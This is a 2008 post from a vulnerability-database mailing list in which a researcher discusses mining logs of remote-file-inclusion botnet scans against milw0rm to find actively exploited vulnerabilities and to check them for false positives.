[VIM] RFI BotNet and phpBB 0-day?
security curmudgeon
jericho at attrition.org
Thu Mar 20 18:12:32 UTC 2008
: If your bored I have a few rfi's for you to go through :)
:
: # wc -l
: todays-rfi-bots.txt
:
: 44737 todays-rfi-bots.txt
:
: The file will show the number of uniq entries that have hit milw0rm in
: the past 24 hours requesting http inclusions. People forget to remove
: milw0rm from their rfi scans.
Hah, this is what I was thinking of doing but automating it more to pull
them out nightly. If time permitted, I was going to get fancy and have it
weed out known vulnerabilities. If not, I wonder if there are a few folks
that could check them if we mail them here with a little research already
done.
Obviously we all want to track vulnerabilities in our respective
databases, but these are of specific interest for several reasons.
Primarily, they are being actively exploited in the wild and would qualify
for 'undercover vulnerabilities' [1].
I'm also curious if these suffer from the 'grep and gripe' false positives
that we see on the mail lists, and if the botnet is essentially trying to
do inclusions on scripts that aren't really vulnerable in the first place.
.b
[1] http://osvdb.org/blog/?p=227
More information about the VIM
mailing list